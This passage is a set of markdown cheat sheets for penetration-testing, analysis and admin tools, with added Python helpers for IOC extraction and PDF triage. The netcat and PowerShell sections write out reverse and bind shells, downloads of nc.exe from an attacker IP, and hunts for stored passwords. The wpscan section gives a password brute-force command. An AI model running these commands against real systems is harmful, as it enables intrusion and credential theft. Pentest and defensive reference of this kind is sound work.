```
mysql -u root -p
```

**List databases:**
```
show databases;
```

**Use a database:**
```
use DATABASE;
```

**List tables:**
```
show tables;
```

**List users:**
```
SELECT User FROM mysql.user;
```

**Create a user and grant it access to one database:**
```
CREATE USER 'newuser'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON DATABASE.* TO 'newuser'@'localhost';
-- DATABASE.* limits the grant to that database; *.* would hand the user every database on the server
```
-------------------------------------------------------------------------------- /nbtscan.md: --------------------------------------------------------------------------------
# Nbtscan

Scan for NetBIOS names

```sh
nbtscan TARGET
nbtscan -O FILE TARGET
# generate HTTP headers in the output
nbtscan -H TARGET
# skip the inverse name lookup of responding IPs, useful when DNS resolution hangs
nbtscan -n TARGET
# UDP source port to send the queries from
nbtscan -p PORT TARGET
```
-------------------------------------------------------------------------------- /netcat.md: --------------------------------------------------------------------------------
# Netcat


**Basic bind shell** (the remote host listens and hands out its shell; you connect to it):
```sh
nc -nvlp 443 -e /bin/bash   # On the remote host
nc -nv IP 443               # On local Kali
```

**Basic reverse shell** (the remote host connects back to your listener):
```sh
sudo nc -nlvp 443            # On local Kali
nc -nv IP 443 -e cmd.exe     # On remote Windows
nc -nv IP 443 -e /bin/bash   # On remote Linux
# -e exists in nc.traditional and ncat, not in the OpenBSD nc; fall back to a bash /dev/tcp shell there
```

**Sending files:**
```sh
sudo nc -nvlp 443 > incoming.exe   # Receiver
nc -nv IP 443 < incoming.exe       # Sender
```
-------------------------------------------------------------------------------- /nmap.md: --------------------------------------------------------------------------------
# Nmap


**Quickstart:**

```sh
nmap -sC -sV --top-ports 20 -oN FILE TARGET
nmap -sC -sV --open --reason -oN FILE TARGET
```

**Full port scan** (OS detection with -O needs root):

```sh
sudo nmap -sV -sC -p- -O --open -oN FILE TARGET
```

**Ping sweep:**

```sh
nmap -sn -PE TARGET
```

**UDP scan** (slow, and needs root):

```sh
sudo nmap -sU TARGET
```

**Scan for open ports, determine open services:**

```sh
nmap --open -sV TARGET
```

**Retrieve a TLS certificate:**
```
nmap -p 443 --script ssl-cert didierstevens.com
```

**Scan and run default scripts:**

```sh
nmap -sC TARGET
```

**Run a specific script:**

```sh
# scripts live in /usr/share/nmap/scripts/ on Kali
nmap --script SCRIPT TARGET
```

**Skip host discovery (treat every host as up):**

```sh
nmap -Pn TARGET
```

**Output result to file:**

```sh
nmap -oN FILE TARGET       # normal (human-readable) output; a bare -o is not a valid nmap option
nmap -oG FILE TARGET       # grepable output
nmap -oX FILE TARGET       # XML output
nmap -oA BASENAME TARGET   # all three formats at once
```
-------------------------------------------------------------------------------- /objdump.md: --------------------------------------------------------------------------------
# objdump

**Disassemble raw shellcode (32-bit, Intel syntax)**:
```
objdump -D -b binary -m i386 -M intel shellcode.bin
# for 64-bit shellcode use -m i386:x86-64
```
-------------------------------------------------------------------------------- /openssl.md: --------------------------------------------------------------------------------
# Openssl

**Parse and print a PEM certificate:**
```
openssl x509 -in cert.crt -text -noout
```

**Same with DER:**
```
openssl x509 -in cert.crt -inform der -text -noout
```

**Print a CRL** (`x509` does not read CRLs, `crl` does):
```
openssl crl -in list.crl -inform der -text -noout
```

**Verify a certificate against its chain** (`<(...)` is bash process substitution):
```
openssl verify -CAfile <(cat Intermediate.pem RootCert.pem) UserCert.pem
```

**Download and show info on an online certificate** (add `-servername DOMAIN` when the server relies on SNI):
```
openssl s_client -showcerts -connect DOMAIN:443 </dev/null | openssl x509 -text -noout
```

**Get the fingerprint of a certificate** (use SHA-256; MD5/SHA-1 fingerprints are accepted but should not be used for pinning or comparison):
```
openssl x509 -noout -fingerprint -sha256 -inform pem -in certificate-file.crt
```

**Remotely check a certificate chain:**
```
openssl s_client -showcerts -connect www.domain.com:443
```

**Print a PKCS7 certificate bundle:**
```
openssl pkcs7 -inform DER -print_certs -text -in FILE
```
-------------------------------------------------------------------------------- /pdf-parser.md: --------------------------------------------------------------------------------
# pdf-parser

**See stats**
```
pdf-parser.py --stats FILE.PDF
```

**Search for javascript objects**
```
pdf-parser.py --search javascript FILE.PDF
```

**See objects referencing another object** (here object 45)
```
pdf-parser.py --reference 45 --raw FILE.PDF
```

**See object details**
```
pdf-parser.py --object 45 --raw FILE.PDF
```
-------------------------------------------------------------------------------- /pdf.md: --------------------------------------------------------------------------------
# pdf

The best tools are pdfid, pdf-parser and peepdf (python2 only).

**First use pdfid to get an overview of what is inside the PDF:**
```
pdfid.py PDF.PDF
```

**Display stats with pdf-parser:**
```
pdf-parser.py -a PDF.PDF
```

**Parse the whole PDF with pdf-parser:**
```
pdf-parser.py PDF.PDF
```

**Show details on a specific object:**
```
pdf-parser.py --object id file.pdf
```

**Search for javascript:**
```
pdf-parser.py --search=javascript pdf.pdf
```

Names to search for:
* /OpenAction and /AA: usually where a script or action is triggered automatically (on open, on page view, ...)
* /JavaScript and /JS: where JavaScript code lives
* /GoTo: changes the view to a destination inside the PDF, or in another PDF
* /Launch: launches a program or opens a document
* /URI: opens a URL
* /SubmitForm and /GoToR: can send data to a URL
* /RichMedia: can embed Flash
* /ObjStm: an object stream, which can hide other objects inside it
* Obfuscation of names with hex escapes is a pattern, i.e. /JavaScript vs. 
/J#61vaScript (#61 is the hex code of the letter a; the two are the same name to a PDF reader)
-------------------------------------------------------------------------------- /pip.md: --------------------------------------------------------------------------------
# Pip

**Install a specific version:**
```
pip install maxminddb==1.2.1
```

**Upgrade a package:**
```
pip install Django --upgrade
```

**Automatically create requirements:**
```
pip freeze > requirements.txt
```
-------------------------------------------------------------------------------- /powershell.md: --------------------------------------------------------------------------------
# Powershell

**TCP port scan (ports 1-1024, prints only the ports that accept a connection):**
```powershell
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "Port $_ is open!"} 2>$null
```


**Download remote files:**
```powershell
powershell "(New-Object System.Net.WebClient).DownloadFile('URL', 'C:\path\file')"
```


**Look for passwords:**
```powershell
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
dir /s *pass* == *.config          # cmd.exe syntax
findstr /si password *.xml *.ini *.txt *.bat *.ps1
# don't forget that hidden files exist
ls -Force
```

**Specific string search:**
```powershell
ls -r C:\PATH -File | % { Select-String -Path $_ -Pattern PATTERN }
```

**Credentials:**
```powershell
# Import credentials from a PowerShell CliXml file (as written by Export-CliXml)
$creds = Import-CliXml -Path C:\Users\file.txt
$creds.GetNetworkCredential().Password

# Get-Credential prompts for a username and password and returns a PSCredential object
Get-Credential
# or pre-fills the username
Get-Credential -Credential $user
```

Get-Credential returns an object for which there is a good
[documentation](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-credential?view=powershell-7).

However, an exported credential file only decrypts for the user (and machine) that exported it, because Export-CliXml protects the password with DPAPI: importing another user's file fails.

**Download files onto the host:**
```powershell
Invoke-WebRequest -Uri URL -OutFile FILE

# Win 7
(New-Object System.Net.WebClient).DownloadFile("http://IP/nc.exe", "c:\nc.exe")

# Win 8 and later (wget is an alias of Invoke-WebRequest)
wget "http://IP/nc.exe" -OutFile "c:\nc.exe"
```

**Firewall:**
```powershell
# Get firewall rules
Get-NetFirewallRule -All | Out-GridView
Get-NetFirewallRule -All | Export-Csv FILE

# Add a firewall rule
New-NetFirewallRule -Action Allow -DisplayName NAME -RemoteAddress IP
```
-------------------------------------------------------------------------------- /psql.md: --------------------------------------------------------------------------------
# PostgreSQL

**Connect to psql as the postgres user (most common local authentication)**
```bash
sudo -u postgres psql
```

**Connect with psql**
```bash
psql -h HOST -p PORT -U USER DATABASE
psql -h HOST -p PORT -U USER -W DATABASE   # -W forces a password prompt
```

**List tables**
```
\dt
```

**List databases**
```
\l
```

**List users:**
```
\du
```

**Use a database:**
```
\c DATABASE
```

**Dump from docker:**
```
docker exec -t your-db-container pg_dumpall -c -U postgres > dump_`date +%d-%m-%Y"_"%H_%M_%S`.sql
```

Create a database and a user:
```
CREATE DATABASE yourdbname;
CREATE USER youruser WITH ENCRYPTED PASSWORD 'yourpass';
GRANT ALL PRIVILEGES ON DATABASE yourdbname TO youruser;
```
-------------------------------------------------------------------------------- /python.md: --------------------------------------------------------------------------------
# Python

**Web server (python2)**
```sh
python -m SimpleHTTPServer 8000
```

**Web server (python3)** (serves the current directory on all interfaces; add `--bind 127.0.0.1` to keep it local)
```sh
python -m http.server 8000
```

**argparse:**
```
import argparse

parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
                    help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
                    const=sum, default=max,
                    help='sum the integers (default: find the max)')

args = parser.parse_args()
```

**Pretty print with json:**
```
import json

print(json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=4))
```

**Build and upload a project to PyPI:**
```
python3 -m build
python3 -m twine upload dist/*
```
-------------------------------------------------------------------------------- /regex.md: --------------------------------------------------------------------------------
# regex

**Email**
```
/^([a-zA-Z0-9._%-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,6})$/
/^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/
```

**URL**
```
/https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#()?&//=]*)/
/(https?:\/\/)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)/
```

**IP**
```
/* Match IPv4 address */
/^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/

/* Match IPv6 address */
/(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))/
```

**Dates**
```
/* Date Format YYYY-MM-dd */
/([12]\d{3}-(0[1-9]|1[0-2])-(0[1-9]|[12]\d|3[01]))/
```

**Hashes** (hex length: MD5 32, SHA-1 40, SHA-256 64; SHA-512 would be the same pattern with {128})
```
/* MD5 */
/(?:[^a-fA-F\d]|\b)([a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)/
/* SHA1 */
/(?:[^a-fA-F\d]|\b)([a-fA-F\d]{40})(?:[^a-fA-F\d]|\b)/
/* SHA256 */
/(?:[^a-fA-F\d]|\b)([a-fA-F\d]{64})(?:[^a-fA-F\d]|\b)/
```


-------------------------------------------------------------------------------- /sed.md: --------------------------------------------------------------------------------
# Sed

**Defang a domain name for IOC sharing (replace the last dot with `[.]`, e.g. evil.com -> evil[.]com):**
```bash
sed -E 's/\.([a-z]*)$/[.]\1/g'
```

**Remove comment lines (lines starting with #) from a file:**
```
sed '/^#/ d'
```
-------------------------------------------------------------------------------- /snort.md: --------------------------------------------------------------------------------
# Snort

**Running snort on a pcap** (rules have to be defined in the conf file):
```
snort -r file.pcap -c snort.conf
```

**Basic rule example** (every rule needs a sid; local rules conventionally use sids >= 1000000):
```
alert tcp any any -> $HOME_NET 22 (msg:"Possible SSH buffer overflow"; content:"/bin/sh"; sid:1000001; rev:1;)
```

**Example of a rule with PCRE** (pcre:"/regex/flags"):
```
# the content match prefilters packets so the PCRE only runs on candidates (see Performance rules below)
alert tcp any any -> any any (msg:"PDF is being downloaded"; flow:to_server,established; content:".pdf"; nocase; pcre:"/site\/year\d\d\d\d\.pdf/i"; sid:100003; rev:3;)
```

**Help**:
* Hex encoding in content: `content:"|5c 00|P|00|I|00|P|00|E|00 5c|";` (matches `\PIPE\` encoded as UTF-16LE)
* The characters `"`, `|` and `;` must be escaped with `\` or hex-encoded inside a content option

**Performance rules**:
* Flow matters: `flow:to_client,established;` or `flow:to_server,established;`
* Use content to prefilter if you use PCRE


-------------------------------------------------------------------------------- /sqlite.md: --------------------------------------------------------------------------------
# SQLite

**Run an SQL file:**
```
sqlite3 auction.db < create.sql
```
-------------------------------------------------------------------------------- /ssh.md: --------------------------------------------------------------------------------
# ssh (and other related commands)

**Generate an ssh key** (ed25519, with 100 KDF rounds protecting the passphrase)
```bash
ssh-keygen -o -a 100 -t ed25519
```

**Force password authentication**:
```bash
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no example.com
```

**Search for a server line in known_hosts** (prints its fingerprint):
```bash
ssh-keygen -l -F SERVER
```

**Ignore the new key warning** (disables host key verification entirely, so only for throwaway lab hosts; it leaves you open to a man-in-the-middle):
```bash
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no user@IP
```
-------------------------------------------------------------------------------- /strings.md: --------------------------------------------------------------------------------
# Strings

**Search for Unicode strings (16-bit little-endian, i.e. UTF-16LE as used by Windows binaries)**
```
strings -el FILE
# -e encodings: s = single-7-bit-byte characters (ASCII, ISO 8859, etc., default), S = single-8-bit-byte characters,
# b = 16-bit big-endian, l = 16-bit little-endian, B = 32-bit big-endian, L = 32-bit little-endian
```

**Print the offset of each string in decimal** (`-tx` for hex)
```
strings -td FILE
```
-------------------------------------------------------------------------------- /svn.md: --------------------------------------------------------------------------------
# svn

* Organisation:
  * **trunk** is the main line of development in an SVN repository
  * **branch** is a side line of development created for larger, experimental or disruptive work
  * **tags** are markers that highlight notable revisions in the history of the repository
* Create a local working copy: `svn checkout URL PATH`
* Add a file to the repo: `svn add FILE`
* Commit changes to the remote repo: `svn commit -m "log message"`
* Download remote updates: `svn update`
* See the history of a file: `svn log FILE`
* See the status of the repo: `svn status`



-------------------------------------------------------------------------------- /tar.md: --------------------------------------------------------------------------------
# Tar

**Decompress things** (list an untrusted archive first and check for absolute or `../` paths):

```sh
tar xf archive.tar
tar xvzf archive.tar.gz
tar xjf archive.tar.bz2
tar tvf archive.tar.gz | grep PATTERN   # list the contents without extracting
tar -C DIR -xvf archive.tar             # extract into DIR
unzip archive.zip
gzip -d archive.gz

# read a gz file without decompressing it
zcat archive.gz
zless archive.gz
zgrep PATTERN /var/log/maillog*.gz

# search inside a zip archive
zipgrep PATTERN archive.zip '*.txt'
```

**Compress things:**

```sh
zip -r file.zip /dir/*
tar cf archive.tar files
tar czf archive.tar.gz files
tar cjf archive.tar.bz2 files
gzip file
```
-------------------------------------------------------------------------------- /tmux.md: --------------------------------------------------------------------------------
# tmux

**Share a console** (anyone who can write to the socket gets your shell: restrict it to a shared group rather than 777 when you can)
```
# Me
$ tmux -S /tmp/pair
$ chgrp GROUP /tmp/pair && chmod 770 /tmp/pair   # chmod 777 /tmp/pair opens it to every local user

# Another user
$ tmux -S /tmp/pair attach
```
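The hash and IP patterns in regex.md and the defang one-liner in sed.md above are usually used together when pulling indicators out of a report. The following is an added example, not code from the original page: it adapts the page's MD5/SHA-1/SHA-256 and IPv4 patterns into unanchored Python regexes (lookarounds instead of `^`/`$` so they match inside free text, without matching a 32-hex slice of a longer hash), refangs `[.]`/`hxxp` before matching, and defangs domains again on output exactly like the sed command. The `SAMPLE` text, the hostname regex and the helper names are this example's own; the hashes in the sample are the well-known digests of the empty string.

```python
"""Extract hash, IPv4 and hostname IOCs from text, handling defanged input."""
import re

# Hash patterns: a hex run of exactly the right length that is not part of a longer hex run
HASH_RES = {
    "md5": re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])"),
    "sha1": re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{40}(?![0-9a-fA-F])"),
    "sha256": re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{64}(?![0-9a-fA-F])"),
}
# IPv4: same octet alternation as the page's pattern, unanchored so it matches inside prose
OCTET = r"(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])"
IPV4_RE = re.compile(rf"(?<![\w.])(?:{OCTET}\.){{3}}{OCTET}(?![\w.])")
# Hostnames: dotted labels ending in a 2-6 letter TLD (file names such as a.pdf match too; filter downstream)
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,6}\b", re.IGNORECASE)


def refang(text: str) -> str:
    """Undo common defanging so the regexes see real indicators: [.] and (.) -> ., hxxp -> http."""
    text = text.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"hxxp", "http", text, flags=re.IGNORECASE)


def defang(indicator: str) -> str:
    """Bracket the last dot, like the sed one-liner on the page (evil.test -> evil[.]test)."""
    return re.sub(r"\.([a-z]+)$", r"[.]\1", indicator, flags=re.IGNORECASE)


def extract_iocs(text: str) -> dict:
    """Return sorted, de-duplicated indicators by type, after refanging the input."""
    clean = refang(text)
    found = {name: sorted(set(rx.findall(clean))) for name, rx in HASH_RES.items()}
    found["ipv4"] = sorted(set(IPV4_RE.findall(clean)))
    # An IP never has a letters-only TLD, so the domain regex already rejects it; the subtraction is belt and braces
    found["domain"] = sorted(set(DOMAIN_RE.findall(clean)) - set(found["ipv4"]))
    return found


# Constructed sample report text for the example (not real indicators)
SAMPLE = """Constructed sample. C2 at evil-domain[.]test, dropper fetched from hxxp://198[.]51[.]100[.]23/x
dropper md5 d41d8cd98f00b204e9800998ecf8427e
payload sha256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE).items():
        for value in values:
            # domains go back out defanged so the list is safe to paste into a ticket or chat
            print(f"{kind:7} {defang(value) if kind == 'domain' else value}")
```

The 64-char SHA-256 in the sample also contains 32- and 40-char hex substrings; the lookarounds are what stop those from being reported as an MD5 or SHA-1, which the page's `\b` boundaries achieve the same way.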
-------------------------------------------------------------------------------- /useragent.md: --------------------------------------------------------------------------------
# Useful User-Agents


**Office** (see https://github.com/ua-parser/uap-core/issues/32):
```
Microsoft Office/15.0 (Windows NT 6.2; Microsoft Word 15.0.4693; Pro)
Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.6310; Pro)
Microsoft Office/15.0 (Windows NT 6.2; Microsoft Excel 15.0.4693; Pro)
```

**Chrome on Windows:**
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
```

**Chrome on MacOS:**
```
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
```

**Chrome on iPhone:**
```
Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.123 Mobile/15E148 Safari/605.1
```

**Chrome on Android:**
```
Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3396.81 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 8.0.0; TA-1053 Build/OPR1.170623.026) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3368.0 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19
```

**Safari on iOS:**
```
Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.21 (KHTML, like Gecko) Version/12.0 Mobile/17A6278a Safari/602.1.26
Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1
Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1
```

-------------------------------------------------------------------------------- /vagrant.md: --------------------------------------------------------------------------------
# vagrant

* **vagrant up**: create and provision the machine
* **vagrant provision**: run the provisioning on an existing machine
* **vagrant ssh**: ssh into the machine
* **vagrant suspend**: suspend the machine
* **vagrant halt**: shut down the operating system, keep the VM
* **vagrant destroy**: destroy the VM
* **vagrant resume**: resume a suspended VM
* **vagrant box list**: list existing boxes
* **vagrant box add bento/ubuntu-18.04**: install a new box
-------------------------------------------------------------------------------- /vim.md: --------------------------------------------------------------------------------
# (n)Vim


**Remove blank lines:**
```
:g/^$/d
```

**Remove carriage returns (^M):**
```
:%s/\r//g
```

**Replace something:**
```
:%s/origin/destination/g
```

**Sort lines:**
```
CTRL-V and select lines, or ggVG to select the whole file
:sort

For inverted sort:
:%sort!

For numerical sort:
:sort n
```
-------------------------------------------------------------------------------- /wget.md: --------------------------------------------------------------------------------
# wget

**Continue a download where it stopped if the connection breaks:**
```
wget -c URL
```

**Download files recursively (without ascending to the parent directory):**
```
wget -r -np http://example.com/configs/.vim/
```

**Change the user agent:**
```
wget --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" URL
```

-------------------------------------------------------------------------------- /wordpress.md: --------------------------------------------------------------------------------
# Wordpress

Wordpress CLI:
* Verify Wordpress core checksums (detects modified core files): `wp core verify-checksums`
* Get the Wordpress version: `wp core version`
* List users: `wp user list`
* List plugins: `wp plugin list`
* List posts: `wp post list`
* List deleted posts: `wp post list --post_status=trash`
* Update options: `wp option update home 'http://example.com'`
* Search and replace in the database: `wp search-replace 'example.dev' 'example.com' --skip-columns=guid`

-------------------------------------------------------------------------------- /wp.md: --------------------------------------------------------------------------------
# Wordpress

**Change the site URL:**
```
wp option update home 'http://example.com'
wp option update siteurl 'http://example.com'
```
-------------------------------------------------------------------------------- /wpscan.md: --------------------------------------------------------------------------------
# WPScan

**Quick install:**
```
gem install wpscan
```

**Update the database:**
```
wpscan --update
```

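The pdf.md list earlier on this page names the objects to look for in a suspicious PDF and notes that the names themselves can be obfuscated with `#xx` hex escapes (`/J#61vaScript`), which defeats a naive `grep /JavaScript`. The following is an added example, not code from the original page or from pdfid/pdf-parser: it tokenises every name in the file, resolves the `#xx` escapes before comparing, counts the auto-run and code-execution names from that list, reports which ones were hidden behind escapes, and flags the combination of a trigger (`/OpenAction`, `/AA`) with something to run. `SAMPLE_PDF` is a constructed, minimal PDF skeleton for the example; it does not decompress streams, so names inside compressed `/ObjStm` objects still need pdf-parser.

```python
"""Triage a PDF for auto-run and code-execution names, seeing through #xx name obfuscation."""
import re
from collections import Counter

# Names from the pdf.md list; each one compared after canonicalisation
SUSPICIOUS = ("/OpenAction", "/AA", "/JavaScript", "/JS", "/GoTo", "/GoToR",
              "/Launch", "/URI", "/SubmitForm", "/RichMedia", "/ObjStm")

# A PDF name token: '/' followed by regular characters (anything but whitespace and the delimiters)
NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]+")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def canonical_name(name: bytes) -> str:
    """Resolve #xx escapes so /J#61vaScript and /JavaScript compare equal."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), name).decode("latin-1")


def scan_pdf(data: bytes) -> dict:
    """Count suspicious names, list the obfuscated ones, and flag trigger + payload combinations."""
    counts: Counter = Counter()
    obfuscated = []
    for match in NAME_RE.finditer(data):
        raw = match.group(0)
        name = canonical_name(raw)
        if name in SUSPICIOUS:
            counts[name] += 1
            if b"#" in raw:  # a keyword written with escapes: a strong obfuscation signal on its own
                obfuscated.append(raw.decode("latin-1"))
    has_trigger = bool(counts["/OpenAction"] or counts["/AA"])
    has_payload = bool(counts["/JavaScript"] or counts["/JS"] or counts["/Launch"])
    return {
        "names": dict(counts),
        "obfuscated": obfuscated,
        "auto_exec": has_trigger and has_payload,
    }


# Constructed sample: a catalog whose OpenAction points at an (escaped) JavaScript action, plus a URI link
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"3 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample')) >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://example.test/) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    report = scan_pdf(data)
    for name, n in sorted(report["names"].items()):
        print(f"{name:12} {n}")
    print("obfuscated names:", report["obfuscated"] or "none")
    print("auto-exec chain:", "YES" if report["auto_exec"] else "no")
```

Run it with a file path to scan a real sample, or with no arguments to see the constructed one reported as an auto-exec chain with one obfuscated name. Compare the counts with `pdfid.py`, which does the same canonicalisation and additionally reports streams it had to inflate.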
**Enumerate vulnerable plugins:**
```
wpscan --url http://yourwebsite.com --enumerate vp
```

**Enumerate users:**
```
wpscan --url http://yourwebsite.com --enumerate u
```

**Password bruteforce** (wpscan 3 syntax; `--wordlist`/`--threads` were the 2.x names):
```
wpscan --url http://www.example.com --usernames admin --passwords wordlist_file.txt --max-threads 30
```


-------------------------------------------------------------------------------- /xpath.md: --------------------------------------------------------------------------------
# Xpath

**All external javascript scripts:**
```
//script[@src]/@src
```

**All CSS sheets:**
```
//link[@rel="stylesheet"][@href]/@href
```
-------------------------------------------------------------------------------- /yara.md: --------------------------------------------------------------------------------
# Yara

**Rule example:**

```
rule EXAMPLE {
    meta:
        author = "ME"

    strings:
        $s1 = "string" ascii

    condition:
        all of them
}
```

**Consider only files with an MZ header** (uint16 reads little-endian, so "MZ" is 0x5A4D)
```
condition:
    uint16(0) == 0x5A4D and 3 of them
```

**Consider only files with MZ and PE headers** (the PE signature sits at the offset stored in the DWORD at 0x3C)
```
condition:
    uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of them
```

**Consider only DEX files** ("de" of the "dex\n" magic, little-endian):
```
condition:
    uint16(0) == 0x6564 and all of them
```

**Consider only a sublist of strings**:
```
strings:
    $mandatory = "aa"
    $optional1 = "bb"
    $optional2 = "cc"
    $optional3 = "dd"
condition:
    $mandatory and 2 of ($optional*)
```

**Hex strings** (`??` is a wildcard byte, `A?` a wildcard nibble):
```
$hex_string = { E2 34 ?? C8 A? FB }
```

**Check for an OLE2 (legacy Office) document containing a VBA macro** ($a is the OLE2 magic, $b is "Attribut" as it appears in VBA module streams):
```
strings:
    $a = {d0 cf 11 e0}
    $b = {00 41 74 74 72 69 62 75 74 00}
condition:
    $a at 0 and $b
```
-------------------------------------------------------------------------------- /zeek.md: --------------------------------------------------------------------------------
# Zeek

Analyse a pcap from the docker image (logs are written to the current directory):
```
docker pull zeek/zeek:latest
docker run -v $(pwd):/data -w /data/ -it zeek/zeek /usr/local/zeek/bin/zeek -r /data/FILE
```
--------------------------------------------------------------------------------
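The `-b "\x04\xA0"` entries in msf.md earlier on this page hand a bad-character list to the encoder, but the list is only as good as the bytes you discovered, and the output is worth verifying before it goes into an exploit. The following is an added example, not code from the original page or from Metasploit: it parses the `-f c` style buffer msfvenom prints, checks every byte against the `-b` list (same `\xNN` syntax), reports the offending offsets, and also builds the classic `\x01..\xff` probe string that is sent to the target to find bad characters in the first place. `SAMPLE_C_OUTPUT` is a short constructed buffer in the `-f c` layout, and the function names are this example's own.

```python
"""Check encoded shellcode against a bad-character list, and build a bad-character probe."""
import re

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_c_buffer(text: str) -> bytes:
    """Turn msfvenom -f c output (unsigned char buf[] = "\\xfc\\xe8...";) into raw bytes."""
    return bytes(int(h, 16) for h in _HEX_ESCAPE.findall(text))


def parse_badchar_list(spec: str) -> bytes:
    """Parse the msfvenom -b syntax, e.g. '\\x00\\x04\\xA0' (case-insensitive hex)."""
    return parse_c_buffer(spec)


def find_bad_chars(shellcode: bytes, badchars: bytes) -> list:
    """Return (offset, byte) for every byte of shellcode that is on the bad-character list."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def badchar_probe(exclude: bytes = b"\x00") -> bytes:
    """Every byte 0x01..0xff except those already known to be bad.

    Send this in place of the payload and compare what lands in memory with what was
    sent: the first byte that is mangled or truncates the buffer is the next bad character.
    """
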